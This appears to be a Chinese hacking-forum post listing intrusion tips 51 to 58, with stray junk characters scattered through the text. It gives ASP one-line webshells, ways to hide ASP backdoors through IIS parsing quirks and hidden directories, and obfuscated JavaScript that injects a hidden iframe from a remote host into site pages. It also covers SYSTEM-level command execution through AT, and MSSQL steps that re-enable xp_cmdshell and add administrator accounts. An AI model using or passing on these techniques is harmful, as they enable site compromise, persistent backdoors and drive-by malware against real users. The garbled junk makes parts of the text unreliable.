: G! ~2 i, _( x7 v  h: I
51、log备份时的一句话木马:
- N0 ?: D5 t4 k: W- y" Aa).<%%25Execute(request("go"))%%25>9 a9 c% X4 i- R' B- s' ?" j- ~
b).<%Execute(request("go"))%>, z$ @# t4 A8 l1 ~6 a, P2 a
c).%><%execute request("go")%><%( f( O9 ]0 ?4 V. G
d).<script language=VBScript runat=server>execute request("sb")</Script>5 C$ w7 @; q% W* Y
e).<%25Execute(request("l"))%25>
% h3 K; ~. _9 j6 Q# Z$ s4 nf).<%if request("cmd")<>"" then execute request("pass")%>. W! f) k, A, s

; F# h+ w* a4 ~6 X52、at "12:17" /interactive cmd7 p6 B0 h, ?1 f; q+ `) ?! ^3 f
执行后可以用AT命令查看新加的任务0 }5 }/ i) ?4 y' @2 M) }& s2 U5 |
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。- z* o2 d, t9 y# o8 |: H
; H" o1 p" }+ r- h
53、隐藏ASP后门的两种方法( Y1 b# @9 h+ \, M/ D
1、建立非标准目录:mkdir images..\$ T1 G* m8 T1 y
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
6 L. S6 ]6 }- a3 S通过web访问ASP木马:http://ip/images../news.asp?action=login
$ _) n5 ~1 f6 L; S如何删除非标准目录:rmdir images..\ /s
) C- Q) \& R0 O( x8 {$ }4 l* q2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
! t$ O) J5 z: ^& h8 Pmkdir programme.asp( C% {5 m% c. U: `6 G
新建1.txt文件内容:<!--#include file=”12.jpg”-->
( o& w7 U/ B% ^( D% v新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
% t# u7 Z% t* p( wattrib +H +S programme.asp
; ~% I; ~3 S6 u( c) ]* C, B通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
2 m, A8 ]4 j0 {- }
" j  T. S/ |6 B4 Z6 ?: K54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。4 ?$ z6 V6 k: ]
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。; `! ?5 b! t6 Q( L
1 P% C9 F& Y7 v0 G" l
55、JS隐蔽挂马) P& @; K  a: ^1 r- I0 n3 L
1.
/ g2 ^4 O& {$ L( @* Fvar tr4c3="<iframe src=ht";
$ t( ^4 N% j$ L" h9 I: K2 w- W3 @; m  btr4c3 = tr4c3+"tp:/";
! C' w0 K9 T' T2 s0 U- Q# [4 Ptr4c3 = tr4c3+"/ww";
8 \* ^9 U$ }) q6 \6 R; ^  ^tr4c3 = tr4c3+"w.tr4";
( w, m8 p! _. {9 ]5 {& E0 ?5 utr4c3 = tr4c3+"c3.com/inc/m";
% S7 c/ Z% j1 }0 xtr4c3 = tr4c3+"m.htm style="display:none"></i";7 G9 m: Z8 O% y- m6 R$ L
tr4c3 =tr4c3+"frame>'";% {4 A9 w$ _6 l9 h0 c; U
document.write(tr4c3);7 i. q7 Y1 M% ?% E( J5 \2 ?* F
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
4 D% ]  z% t) Y% s$ ~9 {
3 M4 Q$ x# g% [) ^6 ?8 z2.
- R! E  T+ N' ]# U$ x( o+ `: h" h, S转换进制,然后用EVAL执行。如
0 E$ Q7 \% d: g: f1 p/ ^, Leval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");. D( F/ X9 s8 t$ ~
不过这个有点显眼。
$ b5 M9 G- v5 ]& C( b, ^/ L3.
4 {% e9 A/ k  k8 c( `document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
& o8 {+ A" j0 b3 r# Z8 g: r3 {7 W最后一点,别忘了把文件的时间也修改下。/ z( @5 n: T+ ~' @

1 |5 s6 r) _# `( u4 U56.3389终端入侵常用DOS命令8 |6 A" V! q/ V2 e* n
taskkill taskkill /PID 1248 /t
1 R( e( C7 k+ @- z9 e  e1 y0 j5 @( v. c! o9 X
tasklist 查进程# S+ t9 j& S6 e

' F4 {% G, }4 l- ucacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限+ W9 W$ e0 b: e$ R
iisreset /reboot
) ^# x1 G$ [: @3 ~" w- ytsshutdn /reboot /delay:1    重起服务器# t: e, Q, @4 g; r$ _

2 p' C4 i! E  S; Dlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
4 Y. A" I" O& `3 f5 U9 C, g8 l& v+ l
query user 查看当前终端用户在线情况$ a/ h  K( S7 x# w$ Y
  {/ i0 f5 R9 u/ ^3 |6 s- o
要显示有关所有会话使用的进程的信息,请键入:query process *
; f. y8 c3 |5 f- `: s9 q! t% d8 x4 O& p/ p: E! m" a6 P% n
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
- m2 g+ G3 ]& z$ a; }# [/ P% g' X  T; h% ^
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2. n1 t( }6 O- p5 V, _4 O% ]' I
. R2 J! @: ^4 k# s& f
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM021 r+ a+ ^+ o- M) s5 n2 ?

9 D# h  G/ E  a* x1 k( q; F命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启7 [! u! s+ c5 n
9 D) k+ k4 q; z* f
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
# ^0 S2 a1 y: G" Z# ]; C8 h, H
3 a/ ]) w3 a: Z命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
" P7 i6 [2 k6 m) t( i% d
; `  F- O& J$ O* z命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
  A) _- O  z, ^, T- r" Y7 J1 e$ t+ h4 u' k
56、在地址栏或按Ctrl+O,输入:
8 L, T1 Q5 {* b% ]9 e( p9 ijavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
9 I5 O4 J% m. E- t- N7 u
% O) @& `/ e; b7 n8 P源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
( s: I9 K* s* E0 `  y4 m/ S( K
( K* V( L" p/ m  t$ T  C, ~57、net user的时候,是不能显示加$的用户,但是如果不处理的话,- @& G0 U# y/ r1 a1 B) r
用net localgroup administrators是可以看到管理组下,加了$的用户的。
5 ?+ _" Q* G. f2 o
. \: f# I; i/ v9 F' h2 Q58、 sa弱口令相关命令; _" _: D) j3 q$ R

+ y) U8 Y+ x! l, w- z一.更改sa口令方法:3 a& J+ {- {! @! t6 G" F
用sql综合利用工具连接后,执行命令:
/ o  n" H/ _9 z  E. `exec sp_password NULL,'20001001','sa'
( S' l8 m4 O- Y  Z% ~( }: G(提示:慎用!)
( ]! a; T1 f5 J4 F7 Z- d( A% I. I6 K; G- r5 L
二.简单修补sa弱口令.
$ W; C* u0 ]- M8 _! {7 X, j- V, y! y  e1 e$ O
方法1:查询分离器连接后执行:+ e/ t5 p; |3 N# ?0 V
if exists (select * from
5 D0 V: @8 |/ Ydbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and/ {: ?5 `( ?2 {0 M: ?
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)9 Z2 O- T5 \7 ^2 S6 I* ]" z

" o# a& r1 g" X* R4 O4 T9 {exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'6 p/ ^" r# ^' R6 m9 S
5 |7 O- L6 `6 o
GO- v0 H' S+ U# Q  W% p4 Q) p
2 N: ~0 R/ s6 |& W  V+ L
然后按F5键命令执行完毕# r- k* D6 r6 }4 c" X

' m9 m6 c$ t. y  S) i0 L方法2:查询分离器连接后
8 q; d+ n9 p/ E, {9 b5 C7 Q第一步执行:use master
1 {; n) A! C: j6 r$ Y0 \# l第二步执行:sp_dropextendedproc 'xp_cmdshell'
/ |% \$ t+ Y: F+ s4 W2 N然后按F5键命令执行完毕! s& X- E% h( ?

) ^4 {, n. B$ v! q& V$ |4 h0 j- I  f1 j! ~6 W
三.常见情况恢复执行xp_cmdshell.
3 _5 N7 T+ A: ]  @6 n3 I8 [1 D# Z1 P' b% f8 p2 R5 ]6 p1 E+ k# I

: F/ M/ Q6 O" Y3 G1 b* N8 {1 未能找到存储过程'master..xpcmdshell'.
( Q3 w$ \2 R" J: g   恢复方法:查询分离器连接后,
( v) O% F. ?* X1 C# G# e第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
& [) N6 ^5 Q0 @; y第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! y( H% C- y* z
然后按F5键命令执行完毕2 H8 v6 Z* r% t
& `, x; U; k9 g
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
9 H5 R, i# Y+ p; U' ~! V; z恢复方法:查询分离器连接后,1 @/ R. T' `( P/ G. k
第一步执行:sp_dropextendedproc "xp_cmdshell"
8 P6 G" y2 ]) G  Q第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, M& ?  X! H. M1 g% q然后按F5键命令执行完毕
7 V* g4 N: D& F
+ T  t& \' [. u: D7 v3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)0 x* I/ p$ I( d1 O" n+ D8 ^" N
恢复方法:查询分离器连接后,6 W' l4 j' F/ c; a
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
! Y1 d/ i% o3 A+ Z第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           ' }* ?# `5 q( s+ R: D$ h
然后按F5键命令执行完毕* @8 k  w9 \$ v) C/ O

7 ^0 B+ T5 P$ ^' b% V9 D# a+ P9 F* V四.终极方法.
' J9 b0 t9 D( g, j* I( m: Y- ~3 U如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
. f' ^" b$ z/ h5 I查询分离器连接后,
- U' X/ x) b* T" {' i. P- L; m& [' E2000servser系统:5 q3 t$ w5 Y( P6 F" G  k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
$ v  M" Q$ k  M! P2 n
& Z$ S, `6 Z9 _: ]1 j9 }3 mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'9 t" u8 O1 [3 S, ?$ g' H

7 J' Q% S( @- Uxp或2003server系统:
0 t3 v8 Z$ L6 C* ^6 h5 l. P  a
* I7 c' q' E5 h- D. L1 X! }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
$ o, _" h2 u4 k3 a  B+ L" Z. m3 |; D* c4 R
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 {" p7 b: y1 O$ ^& H6 F6 N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表